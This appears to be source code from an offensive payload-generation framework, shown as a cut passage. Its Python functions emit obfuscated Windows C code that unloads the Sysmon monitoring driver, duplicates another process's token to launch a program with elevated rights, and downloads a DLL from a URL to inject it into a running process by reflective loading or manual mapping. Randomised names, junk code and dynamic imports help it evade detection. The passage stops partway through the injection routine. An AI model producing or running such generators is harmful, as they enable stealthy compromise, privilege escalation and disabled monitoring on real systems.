def Postex_C_UnloadSysmonDriver_windows(ModOpt):

    RandhToken = varname_creator()
    RandTokenPriv = varname_creator()
    RandLuid = varname_creator()
    NdcFilterUnload = varname_creator()

    Ret_code = ""

    IncludeList = ["#include <windows.h>\n","#include <stdio.h>\n","#include <string.h>\n","#include <math.h>\n","#include <time.h>\n"]

    Ret_code += IncludeShuffler(IncludeList)

    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":
        
        if ModOpt["Reflective"] == True:
            
            Ret_code += "#include \"ReflectiveLoader.h\"\n"

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"
        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()
        ModOpt["AdvapiHandle"] = varname_creator()
        
        Ret_code += "HANDLE " + ModOpt["NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt["Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
        Ret_code += "HANDLE " + ModOpt["AdvapiHandle"] + " = GetModuleHandle(\"advapi32.dll\");\n"

    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    Ret_code += "HANDLE " + RandhToken + ";\n"

    if ModOpt["DynImport"] == True:

        NdcOPT = varname_creator()
        NdcATP = varname_creator()
        NdcLPV = varname_creator()

        Ret_code += "FARPROC " + NdcOPT + " = GetProcAddress(" + ModOpt["AdvapiHandle"] + ",\"OpenProcessToken\");\n"
        Ret_code += "if(" + NdcOPT + "(GetCurrentProcess(),TOKEN_ALL_ACCESS,&" + RandhToken + ")){\n"
        Ret_code += "TOKEN_PRIVILEGES " + RandTokenPriv + ";\n"
        Ret_code += "LUID " + RandLuid + ";\n"
        Ret_code += "FARPROC " + NdcLPV + " = GetProcAddress(" + ModOpt["AdvapiHandle"] + ",\"LookupPrivilegeValue\");\n"
        Ret_code += "if(" + NdcLPV + "(NULL,\"SeLoadDriverPrivilege\",&" + RandLuid + ")){\n"
        Ret_code += RandTokenPriv + ".PrivilegeCount = 1;\n"
        Ret_code += RandTokenPriv + ".Privileges[0].Luid = " + RandLuid + ";\n"
        Ret_code += RandTokenPriv + ".Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;\n"
        Ret_code += "FARPROC " + NdcATP + " = GetProcAddress(" + ModOpt["AdvapiHandle"] + ",\"AdjustTokenPrivileges\");\n"
        Ret_code += "if(" + NdcATP + "(" + RandhToken + ",FALSE,&" + RandTokenPriv + ",sizeof(TOKEN_PRIVILEGES),(PTOKEN_PRIVILEGES)NULL,(PDWORD)NULL)){\n"
    else:
        Ret_code += "if(OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&" + RandhToken + ")){\n"
        Ret_code += "TOKEN_PRIVILEGES " + RandTokenPriv + ";\n"
        Ret_code += "LUID " + RandLuid + ";\n"
        Ret_code += "if (LookupPrivilegeValue(NULL,\"SeLoadDriverPrivilege\",&" + RandLuid + ")){\n"
        Ret_code += RandTokenPriv + ".PrivilegeCount = 1;\n"
        Ret_code += RandTokenPriv + ".Privileges[0].Luid = " + RandLuid + ";\n"
        Ret_code += RandTokenPriv + ".Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;\n"
        Ret_code += "if(AdjustTokenPrivileges(" + RandhToken + ",FALSE,&" + RandTokenPriv + ",sizeof(TOKEN_PRIVILEGES),(PTOKEN_PRIVILEGES)NULL,(PDWORD)NULL)){\n"

    Ret_code += "FARPROC " + NdcFilterUnload + " = GetProcAddress(GetModuleHandle(\"fltlib.dll\"),\"FilterUnload\");\n"
    Ret_code += "HRESULT unload = " + NdcFilterUnload + "(\"SysmonDrv\");}}}\n"

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    Ret_code = JunkInjector(Ret_code,ModOpt["JI"],ModOpt["JF"],ModOpt["EF"],False)

    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":
        
        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c",Ret_code)
def Privesc_C_DuplicateTokenEx_windows(ModOpt):

    Binpath = ModOpt["Binpath"]
    Pidtarget = ModOpt["TargetPid"]

    Randprochandle = varname_creator()
    Randtokenhandle = varname_creator()
    RandDuphandle = varname_creator()
    Randsi = varname_creator()
    Randpi = varname_creator()

    Ret_code = ""

    IncludeList = [
        "#include <windows.h>\n", "#include <stdio.h>\n",
        "#include <string.h>\n", "#include <math.h>\n", "#include <time.h>\n"
    ]

    Ret_code += IncludeShuffler(IncludeList)

    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"
        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"

    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()
        ModOpt["AdvapiHandle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "AdvapiHandle"] + " = GetModuleHandle(\"advapi32.dll\");\n"

    Ret_code += "$:EVA\n"

    Ret_code += "HANDLE " + Randtokenhandle + " = NULL;\n"
    Ret_code += "HANDLE " + RandDuphandle + " = NULL;\n"
    Ret_code += "STARTUPINFOW " + Randsi + ";\n"
    Ret_code += "PROCESS_INFORMATION " + Randpi + ";\n"
    Ret_code += "ZeroMemory(&" + Randsi + ", sizeof(STARTUPINFOW));\n"
    Ret_code += "ZeroMemory(&" + Randpi + ", sizeof(PROCESS_INFORMATION));\n"
    Ret_code += Randsi + ".cb = sizeof(STARTUPINFO);\n"

    if ModOpt["DynImport"] == True:
        NdcOP = varname_creator()
        NdcOPT = varname_creator()
        NdcDTE = varname_creator()
        NdcCPWTW = varname_creator()

        Ret_code += "FARPROC " + NdcOP + " = GetProcAddress(" + ModOpt[
            "Ker32Handle"] + ",\"OpenProcess\");\n"
        Ret_code += "FARPROC " + NdcOPT + " = GetProcAddress(" + ModOpt[
            "AdvapiHandle"] + ",\"OpenProcessToken\");\n"
        Ret_code += "FARPROC " + NdcDTE + " = GetProcAddress(" + ModOpt[
            "AdvapiHandle"] + ",\"DuplicateTokenEx\");\n"
        Ret_code += "FARPROC " + NdcCPWTW + " = GetProcAddress(" + ModOpt[
            "AdvapiHandle"] + ",\"CreateProcessWithTokenW\");\n"
        Ret_code += "HANDLE " + Randprochandle + " = " + NdcOP + "(PROCESS_ALL_ACCESS,TRUE," + Pidtarget + ");\n"
        Ret_code += NdcOPT + "(" + Randprochandle + ", TOKEN_ALL_ACCESS, &" + Randtokenhandle + ");\n"
        Ret_code += NdcDTE + "(" + Randtokenhandle + ", TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &" + RandDuphandle + ");\n"
        Ret_code += NdcCPWTW + "(" + RandDuphandle + ", LOGON_WITH_PROFILE, NULL,\"" + Binpath + "\", 0, NULL, NULL, &" + Randsi + ", &" + Randpi + ");\n"

    else:

        Ret_code += "HANDLE " + Randprochandle + " = OpenProcess(PROCESS_ALL_ACCESS,TRUE," + Pidtarget + ");\n"
        Ret_code += "OpenProcessToken(" + Randprochandle + ", TOKEN_ALL_ACCESS, &" + Randtokenhandle + ");\n"
        Ret_code += "DuplicateTokenEx(" + Randtokenhandle + ", TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &" + RandDuphandle + ");\n"
        Ret_code += "CreateProcessWithTokenW(" + RandDuphandle + ", LOGON_WITH_PROFILE, NULL,L\"" + Binpath + "\", 0, NULL, NULL, &" + Randsi + ", &" + Randpi + ");\n"

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"],
                            False)

    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c", Ret_code)
Beispiel #3
0
def DownloadExecDll_C_windows(ModOpt):

    UrlTarget = ModOpt["UrlTarget"]
    Filesize = ModOpt["Filesize"]

    RandvarFsize = varname_creator()
    RandhProcess = varname_creator()
    Randentry = varname_creator()
    RandProcsnapshot = varname_creator()
    Randlpv = varname_creator()
    Randpointer = varname_creator()
    RandhInternet = varname_creator()
    RandhURL = varname_creator()
    RandvarBRead = varname_creator()
    RandvarBWritten = varname_creator()
    RandisRead = varname_creator()
    Randflag = varname_creator()
    RandhThread = varname_creator()
    Randlpv2 = varname_creator()

    ModOpt["Lpvoid"] = Randlpv

    CryptFile(ModOpt)

    if ModOpt["ExecMethod"] in ["ReflectiveDll","RD","RDAPC","RDTC"]:

        RandRvaParam = varname_creator()
        RandBaseAddrParam = varname_creator()
        RandFuncRva2Offset = varname_creator()
        RandIndex = varname_creator()
        RandSectHeader = varname_creator()
        RandNtHeader = varname_creator()
        RandBaseAddr = varname_creator()
        RandExportDir = varname_creator()
        RandArrName = varname_creator()
        RandArrAddr = varname_creator()
        RandOrdName = varname_creator()
        RandLoaderOffset = varname_creator()
        RandExportedFunc = varname_creator()
        RandCounter = varname_creator()

    elif ModOpt["ExecMethod"] in ["ManualMap","MM"]:

        RandLoadLib = varname_creator()
        RandGetProcAddr = varname_creator()
        RandPdllMain = varname_creator()
        RandLoadStruct = varname_creator()
        RandImgDosHeader = varname_creator()
        RandImgNTHeader = varname_creator()
        RandImgSectHeader = varname_creator()
        RandhModule = varname_creator()
        Randflag2 = varname_creator()
        RandvarFunc = varname_creator()
        RandvarList = varname_creator()
        RandImgImport = varname_creator()
        RandvarEntry = varname_creator()
        RandvarDelta = varname_creator()
        RandPtrLoader = varname_creator()
        RandImgBaseReloc = varname_creator()
        RandImgImportDesc = varname_creator()
        RandFirstT = varname_creator()
        RandOrigFirstT = varname_creator()
        RandImgEntryTls = varname_creator()
        RandTlsDir = varname_creator()
        RandCallback = varname_creator()
        RandLoaderMem = varname_creator()


    Ret_code = ""

    IncludeList = ["#include <stdlib.h>\n","#include <windows.h>\n","#include <stdio.h>\n","#include <string.h>\n","#include <time.h>\n","#include <math.h>\n"]

    Ret_code += IncludeShuffler(IncludeList) + "#include <tlhelp32.h>\n"

    Ret_code += "#include <wininet.h>\n"

    if ModOpt["ExecMethod"] in ["ReflectiveDll","RD","RDAPC","RDTC"]:

        Ret_code += "DWORD " + RandFuncRva2Offset + "( DWORD " + RandRvaParam + ", UINT_PTR " + RandBaseAddrParam + " ){\n"
        Ret_code += "WORD " + RandIndex + " = 0;\n"
        Ret_code += "PIMAGE_SECTION_HEADER " + RandSectHeader + " = NULL;\n"
        Ret_code += "PIMAGE_NT_HEADERS " + RandNtHeader + " = NULL;\n"
        Ret_code += RandNtHeader + " = (PIMAGE_NT_HEADERS)(" + RandBaseAddrParam + " + ((PIMAGE_DOS_HEADER)" + RandBaseAddrParam + ")->e_lfanew);\n"
        Ret_code += RandSectHeader + " = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&" + RandNtHeader + "->OptionalHeader) + " + RandNtHeader + "->FileHeader.SizeOfOptionalHeader);\n"
        Ret_code += "if( " + RandRvaParam + " < " + RandSectHeader + "[0].PointerToRawData )\n"
        Ret_code += "return " + RandRvaParam + ";\n"
        Ret_code += "for( " + RandIndex + "=0 ; " + RandIndex + " < " + RandNtHeader + "->FileHeader.NumberOfSections ; " + RandIndex + "++ ){\n"
        Ret_code += "if( " + RandRvaParam + " >= " + RandSectHeader + "[" + RandIndex + "].VirtualAddress && " + RandRvaParam + " < (" + RandSectHeader + "[" + RandIndex + "].VirtualAddress + " + RandSectHeader + "[" + RandIndex + "].SizeOfRawData) )\n"
        Ret_code += "return ( " + RandRvaParam + " - " + RandSectHeader + "[" + RandIndex + "].VirtualAddress + " + RandSectHeader + "[" + RandIndex + "].PointerToRawData );}\n"
        Ret_code += "return 0;}\n"

    elif ModOpt["ExecMethod"] in ["ManualMap","MM"]:

        Ret_code += "typedef HMODULE (WINAPI * " + RandLoadLib + ")(LPCSTR);\n"
        Ret_code += "typedef FARPROC (WINAPI * " + RandGetProcAddr+ ")(HMODULE,LPCSTR);\n"
        Ret_code += "typedef BOOL (WINAPI * " + RandPdllMain + ")(HMODULE,DWORD,LPVOID);\n"
        #Ret_code += "typedef BOOL (NTAPI *pRtlAddFunctionTable)(PRUNTIME_FUNCTION,DWORD,DWORD64);\n"
 
        Ret_code += "typedef struct _" + RandLoadStruct + "{"
        Ret_code += "LPVOID ImageBase;"
        Ret_code += "PIMAGE_NT_HEADERS NtHeaders;"
        Ret_code += "PIMAGE_BASE_RELOCATION BaseRelocation;"
        Ret_code += "PIMAGE_IMPORT_DESCRIPTOR ImportDirectory;"
        Ret_code += RandLoadLib + " fnLoadLibraryA;"
        Ret_code += RandGetProcAddr+ " fnGetProcAddress;"
        #Ret_code += "pRtlAddFunctionTable fnRtlAddFunctionTable;\n"
        Ret_code += "}" + RandLoadStruct + ",*P" + RandLoadStruct + ";\n"
 
        Ret_code += "static SIZE_T WINAPI LoadDll(LPVOID p){\n"
        Ret_code += "P" + RandLoadStruct + " " + RandPtrLoader+ " = (P" + RandLoadStruct + ")p;\n"
        Ret_code += "HMODULE " + RandhModule + ";\n"
        Ret_code += "DWORD " + Randflag2 + "," + Randflag + ";\n"
        Ret_code += "DWORD " + RandvarFunc + ";\n"
        Ret_code += "PWORD " + RandvarList + ";\n"
        Ret_code += "PIMAGE_IMPORT_BY_NAME " + RandImgImport + ";\n"
        Ret_code += RandPdllMain + " " + RandvarEntry+ ";\n"
        Ret_code += "SIZE_T " + RandvarDelta+ ";\n"
        Ret_code += RandvarDelta+ "=(SIZE_T)((LPBYTE)" + RandPtrLoader+ "->ImageBase-" + RandPtrLoader+ "->NtHeaders->OptionalHeader.ImageBase);\n"
        Ret_code += "if(" + RandvarDelta+ " != 0){\n"
        Ret_code += "PIMAGE_BASE_RELOCATION " + RandImgBaseReloc+ " = " + RandPtrLoader+ "->BaseRelocation;\n"
        Ret_code += "while(" + RandImgBaseReloc+ "->VirtualAddress){\n"
        Ret_code += "if(" + RandImgBaseReloc+ "->SizeOfBlock>=sizeof(IMAGE_BASE_RELOCATION)){\n"
        Ret_code += Randflag + "=(" + RandImgBaseReloc+ "->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/sizeof(WORD);\n"
        Ret_code += RandvarList + "=(PWORD)(" + RandImgBaseReloc+ "+1);\n"
        Ret_code += "for(" + Randflag2 + "=0;" + Randflag2 + "<" + Randflag + ";" + Randflag2 + "++){\n"
        Ret_code += "if(" + RandvarList + "[" + Randflag2 + "]){\n"
        Ret_code += "PDWORD ptr=(PDWORD)((LPBYTE)" + RandPtrLoader+ "->ImageBase+(" + RandImgBaseReloc+ "->VirtualAddress+(" + RandvarList + "[" + Randflag2 + "] & 0xFFF)));\n"
        Ret_code += "*ptr+=" + RandvarDelta+ ";}}}\n"
        Ret_code += RandImgBaseReloc+ "=(PIMAGE_BASE_RELOCATION)((LPBYTE)" + RandImgBaseReloc+ "+" + RandImgBaseReloc+ "->SizeOfBlock);}}\n"
        Ret_code += "PIMAGE_IMPORT_DESCRIPTOR " + RandImgImportDesc+ " = " + RandPtrLoader+ "->ImportDirectory;\n"
        Ret_code += "PIMAGE_THUNK_DATA " + RandFirstT+ "," + RandOrigFirstT+ ";\n"
        Ret_code += "while(" + RandImgImportDesc+ "->Characteristics){\n"
        Ret_code += RandOrigFirstT + "=(PIMAGE_THUNK_DATA)((LPBYTE)" + RandPtrLoader+ "->ImageBase+" + RandImgImportDesc+ "->OriginalFirstThunk);\n"
        Ret_code += RandFirstT+ "=(PIMAGE_THUNK_DATA)((LPBYTE)" + RandPtrLoader+ "->ImageBase+" + RandImgImportDesc+ "-> FirstThunk);\n"
        Ret_code += RandhModule + "=" + RandPtrLoader+ "->fnLoadLibraryA((LPCSTR)" + RandPtrLoader+ "->ImageBase+" + RandImgImportDesc+ "->Name);\n"
        Ret_code += "while(" + RandOrigFirstT+ "->u1.AddressOfData){\n"
        Ret_code += "if(" + RandOrigFirstT+ "->u1.Ordinal & IMAGE_ORDINAL_FLAG){\n"
        Ret_code += RandvarFunc + "=(DWORD)" + RandPtrLoader+ "->fnGetProcAddress(" + RandhModule + ",(LPCSTR)(" + RandOrigFirstT+ "->u1.Ordinal & 0xFFFF)); \n"
        Ret_code += RandFirstT+ "->u1.Function=" + RandvarFunc + ";}\n"
        Ret_code += "else{\n"
        Ret_code += RandImgImport + "=(PIMAGE_IMPORT_BY_NAME)((LPBYTE)" + RandPtrLoader+ "->ImageBase+" + RandOrigFirstT+ "->u1.AddressOfData);\n"
        Ret_code += RandvarFunc + "=(DWORD)" + RandPtrLoader+ "->fnGetProcAddress(" + RandhModule + ",(LPCSTR)" + RandImgImport + "->Name);\n"
        Ret_code += RandFirstT+ "->u1.Function=" + RandvarFunc + ";}\n"
        Ret_code += RandOrigFirstT+ "++;\n"
        Ret_code += RandFirstT+ "++;}" + RandImgImportDesc+ "++;}\n"
        #Ret_code += "IMAGE_DATA_DIRECTORY " + RandImgEntryTls+ " = " + RandPtrLoader+ "->NtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS];\n"
        #Ret_code += "if(" + RandImgEntryTls+ ".VirtualAddress != 0){\n"
        #Ret_code += "PIMAGE_TLS_DIRECTORY " + RandTlsDir+ " = (PIMAGE_TLS_DIRECTORY)((LPBYTE)" + RandPtrLoader+ "->ImageBase + " + RandImgEntryTls+ ".VirtualAddress);\n"
        #Ret_code += "PIMAGE_TLS_CALLBACK *" + RandCallback+ " = (PIMAGE_TLS_CALLBACK *)" + RandTlsDir+ "->AddressOfCallBacks;\n"
        #Ret_code += "if(" + RandCallback+ "){\n"
        #Ret_code += "while (*" + RandCallback+ "){\n"
        #Ret_code += "(*" + RandCallback+ ")((HMODULE)" + RandPtrLoader + "->ImageBase, DLL_PROCESS_ATTACH, NULL);\n"
        #Ret_code += RandCallback+ "++;}}}\n"
 
        Ret_code += "if(" + RandPtrLoader+ "->NtHeaders->OptionalHeader.AddressOfEntryPoint){\n"
        Ret_code += RandvarEntry+ "=( " + RandPdllMain + ")((LPBYTE)" + RandPtrLoader+ "->ImageBase+" + RandPtrLoader+ "->NtHeaders->OptionalHeader.AddressOfEntryPoint);\n"
        Ret_code += "return " + RandvarEntry+ "((HMODULE)(" + RandPtrLoader+ "->ImageBase),DLL_PROCESS_ATTACH,NULL);}\n"
        Ret_code += "return TRUE;}\n"

        Ret_code += "static SIZE_T WINAPI LoadDllEnd(){return 0;}\n"

    #Ret_code += "#define CountRelocationEntries(dwBlockSize) (dwBlockSize - sizeof(BASE_RELOCATION_BLOCK)) / sizeof(BASE_RELOCATION_ENTRY)\n"

    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"
        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    Ret_code += "PROCESSENTRY32 " + Randentry + ";\n"
    Ret_code += Randentry + ".dwSize = sizeof(PROCESSENTRY32);\n"

    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()
        Wininet = varname_creator()
        NdcTl32Snapshot = varname_creator()
        NdcProcess32First = varname_creator()
        NdcProcess32Next = varname_creator()
        NdcOpenProcess = varname_creator()

        Ret_code += "HANDLE " + ModOpt["NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt["Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
        Ret_code += "HANDLE " + Wininet + " = GetModuleHandle(\"wininet.dll\");\n" 
        Ret_code += "FARPROC " + NdcTl32Snapshot + " = GetProcAddress(" + Wininet + ", \"CreateToolhelp32Snapshot\");\n"
        Ret_code += "FARPROC " + NdcProcess32First + " = GetProcAddress(" + Wininet + ", \"Process32First\");\n"
        Ret_code += "FARPROC " + NdcProcess32Next + " = GetProcAddress(" + Wininet + ", \"Process32Next\");\n"
        Ret_code += "HANDLE " + RandProcsnapshot + " = (HANDLE)" + NdcTl32Snapshot + "(TH32CS_SNAPPROCESS, 0);\n"
        Ret_code += "if(" + NdcProcess32First + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "while(" + NdcProcess32Next + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "if(strcmp(" + Randentry + ".szExeFile,\"" + ModOpt["ProcTarget"] + "\") == 0){\n"
        Ret_code += "FARPROC " + NdcOpenProcess + " = GetProcAddress(" + Wininet + ", \"OpenProcess\");\n"
        Ret_code += "HANDLE " + RandhProcess + " = (HANDLE)" + NdcOpenProcess + "(PROCESS_ALL_ACCESS, FALSE," + Randentry + ".th32ProcessID);\n"

    else:

        Ret_code += "HANDLE " + RandProcsnapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\n"
        Ret_code += "if (Process32First(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "while (Process32Next(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "if(strcmp(" + Randentry + ".szExeFile,\"" + ModOpt["ProcTarget"] + "\") == 0){\n"
        Ret_code += "HANDLE " + RandhProcess + " = OpenProcess(PROCESS_ALL_ACCESS, FALSE," + Randentry + ".th32ProcessID);\n"


    Ret_code += "int " + RandvarFsize + " = " + ModOpt["Filesize"] + ";\n"
    Ret_code += "DWORD " + RandvarBWritten +  " = 0;\n"

    if ModOpt["DynImport"] == True:

        NdcInternetOpenA = varname_creator()
        NdcInternetOpenUrl = varname_creator()
        NdcVirtualAlloc = varname_creator()
        NdcInternetReadFile = varname_creator()
 
        Ret_code += "FARPROC " + NdcInternetOpenA + " = GetProcAddress(" + Wininet + ", \"InternetOpenA\");\n"
        Ret_code += "HINTERNET " + RandhInternet + " = (HINTERNET)" + NdcInternetOpenA + "(\"Mozilla/4.0\", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n"
        Ret_code += "if(" + RandhInternet + " != NULL){\n"
        Ret_code += "FARPROC " + NdcInternetOpenUrl + " = GetProcAddress(" + Wininet + ", \"InternetOpenUrl\");\n"
        Ret_code += "HINTERNET " + RandhURL + " = (HINTERNET)" + NdcInternetOpenUrl + "(" + RandhInternet + ",\"" + UrlTarget + "\",NULL, 0,INTERNET_FLAG_RESYNCHRONIZE | INTERNET_FLAG_NO_CACHE_WRITE, 0);\n"
        Ret_code += "FARPROC " + NdcVirtualAlloc + " = GetProcAddress(" + Wininet + ", \"VirtualAlloc\");\n"
        Ret_code += "unsigned char * " + Randlpv + " = (LPVOID)" + NdcVirtualAlloc + "(0," + RandvarFsize + ", MEM_COMMIT, PAGE_READWRITE);\n"
        Ret_code += "ZeroMemory(" + Randlpv + "," + RandvarFsize + ");\n"
        Ret_code += "char * " + Randpointer + " = " + Randlpv + ";\n"
        Ret_code += "DWORD " + RandvarBRead + ";\n"
        Ret_code += "do{\n"
        Ret_code += "FARPROC " + NdcInternetReadFile + " = GetProcAddress(" + Wininet + ", \"InternetReadFile\");\n"
        Ret_code += "BOOL " + RandisRead + " = " + NdcInternetReadFile + "(" + RandhURL + "," + Randpointer + ", 1024, &" + RandvarBRead + ");\n"
    else:

        Ret_code += "HINTERNET " + RandhInternet +  " = InternetOpenA(\"Mozilla/4.0\", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n"
        Ret_code += "if(" + RandhInternet +  " != NULL){\n"
        Ret_code += "HINTERNET " + RandhURL + " = InternetOpenUrl(" + RandhInternet +  ",\"" + ModOpt["UrlTarget"] + "\",NULL, 0,INTERNET_FLAG_RESYNCHRONIZE | INTERNET_FLAG_NO_CACHE_WRITE, 0);\n"
        Ret_code += "unsigned char * " + Randlpv +  " = VirtualAlloc(0," + RandvarFsize + ", MEM_COMMIT, PAGE_READWRITE);\n"
        Ret_code += "ZeroMemory(" + Randlpv +  "," + RandvarFsize + ");\n"
        Ret_code += "char * " + Randpointer +  " = " + Randlpv +  ";\n"
        Ret_code += "DWORD " + RandvarBRead +  ";\n"
        Ret_code += "do{\n"
        Ret_code += "BOOL RandisRead = InternetReadFile(" + RandhURL + "," + Randpointer +  ", 1024, &" + RandvarBRead +  ");\n"

    Ret_code += Randpointer +  " += " + RandvarBRead +  ";\n"
    Ret_code += "}while(" + RandvarBRead +  " > 0);\n"

    if ModOpt["Decoder"] != "False":

        Ret_code += ModOpt["Decoder"]

    if ModOpt["ExecMethod"] in ["ReflectiveDll","RD","RDAPC","RDTC"]:

        Ret_code += "UINT_PTR " + RandBaseAddr +  " = (UINT_PTR)" + Randlpv +  ";\n"
        Ret_code += "UINT_PTR " + RandExportDir +  " = " + RandBaseAddr +  " + ((PIMAGE_DOS_HEADER)" + RandBaseAddr +  ")->e_lfanew;\n"
        Ret_code += "UINT_PTR " + RandArrName +  " = (UINT_PTR)&((PIMAGE_NT_HEADERS)" + RandExportDir +  ")->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];\n"
        Ret_code += RandExportDir +  " = " + RandBaseAddr +  " + " + RandFuncRva2Offset + "(((PIMAGE_DATA_DIRECTORY)" + RandArrName +  ")->VirtualAddress, " + RandBaseAddr +  " );\n"
        Ret_code += RandArrName +  " = " + RandBaseAddr +  " + " + RandFuncRva2Offset + "(((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir +  ")->AddressOfNames, " + RandBaseAddr +  " );\n"
        Ret_code += "UINT_PTR " + RandArrAddr +  " = " + RandBaseAddr +  " + " + RandFuncRva2Offset + "(((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir +  ")->AddressOfFunctions, " + RandBaseAddr +  " );\n"
        Ret_code += "UINT_PTR " + RandOrdName +  " = " + RandBaseAddr +  " + " + RandFuncRva2Offset + "(((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir +  ")->AddressOfNameOrdinals, " + RandBaseAddr +  " );\n"
        Ret_code += "DWORD " + RandCounter +  " = ((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir +  ")->NumberOfNames;\n"
        Ret_code += "DWORD " + RandLoaderOffset +  ";\n"
        Ret_code += "while( " + RandCounter +  "-- ){\n"
        Ret_code += "char * " + RandExportedFunc +  " = (char *)(" + RandBaseAddr +  " + " + RandFuncRva2Offset + "(*(DWORD *)(" + RandArrName +  ")," + RandBaseAddr +  "));\n"
        Ret_code += "if(strstr( " + RandExportedFunc +  ", \"ReflectiveLoader\" ) != NULL){\n"
        Ret_code += RandArrAddr +  " = " + RandBaseAddr +  " + " + RandFuncRva2Offset + "(((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir +  ")->AddressOfFunctions, " + RandBaseAddr +  " );\n"
        Ret_code += RandArrAddr +  " += (*(WORD *)(" + RandOrdName +  ")*sizeof(DWORD));\n"
        Ret_code += RandLoaderOffset +  " = " + RandFuncRva2Offset + "(*(DWORD *)(" + RandArrAddr +  ")," + RandBaseAddr + ");}\n"
        Ret_code += RandArrName +  " += sizeof(DWORD);\n"
        Ret_code += RandOrdName +  " += sizeof(WORD);}\n"

        if ModOpt["DynImport"] == True:

            NdcVirtualAllocEx = varname_creator()
            NdcWriteProcessMemory = varname_creator()

            Ret_code += "FARPROC " + NdcVirtualAllocEx + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"VirtualAllocEx\");\n"
            Ret_code += "FARPROC " + NdcWriteProcessMemory + " = GetProcAddress(" + ModOpt["NtdllHandle"] + ", \"WriteProcessMemory\");\n"
            Ret_code += "LPVOID " + Randlpv2 +  " = (LPVOID)" + NdcVirtualAllocEx + "(" + RandhProcess +  ",NULL," + RandvarFsize +  ",MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);\n"
